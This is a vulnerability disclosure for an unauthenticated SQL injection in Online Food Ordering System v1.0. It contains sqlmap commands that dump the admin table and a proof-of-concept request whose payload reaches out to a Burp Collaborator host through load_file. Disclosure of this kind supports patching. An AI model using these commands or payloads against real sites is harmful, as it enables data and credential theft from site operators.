Online Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the Search parameter at /online-food-order/food-search.php.

\# Online Food Ordering System Unauthenticated Sql Injection \* Exploit Date: 4/18/2022 \* Exploit Author: Nguyen Phu Hung (d4rkp0w4r) # Exploit \* Injection Point => \`Search\` !\[\](https://i.imgur.com/7SaRKPz.jpg) \* Use Burp Suite capture request then save as \`food.txt\` !\[\](https://i.imgur.com/RxxNRAR.png) \* Use \`Sqlmap\` exploit databases \`\`\`python= python sqlmap.py -r food.txt -batch -current-db \`\`\` !\[\](https://i.imgur.com/Ajuhaeu.png) \`\`\`python= python sqlmap.py -r food.txt -batch -D onlinefoodorder -tables \`\`\` !\[\](https://i.imgur.com/u0b1253.png) \`\`\`python= python sqlmap.py -r food.txt -columns -D onlinefoodorder -T tbl\_admin -dump \`\`\` \*\*Information Disclosure\*\* !\[\](https://i.imgur.com/HcgSNbi.png) # Vulnerable Code !\[\](https://i.imgur.com/CC9MvzY.png) \* No filter \`search\` when inserting data to database # POC \* Request \`\`\`python= POST /online-food-order/food-search.php HTTP/1.1 Host: 192.168.1.101:8888 Origin: http://192.168.1.101:8888 Cookie: PHPSESSID=g4piuq3kkuno5h981rkgb3njva Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101:8888/online-food-order/foods.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 140 search=373255'%2b(select%20load\_file('%5c%5c%5c%5cmsio14xruabfnv9ja1936c9phgn9b8zz2nuaky9.burpcollaborator.net%5c%5cqtq'))%2b'&submit=Search \`\`\`

Tag

#windows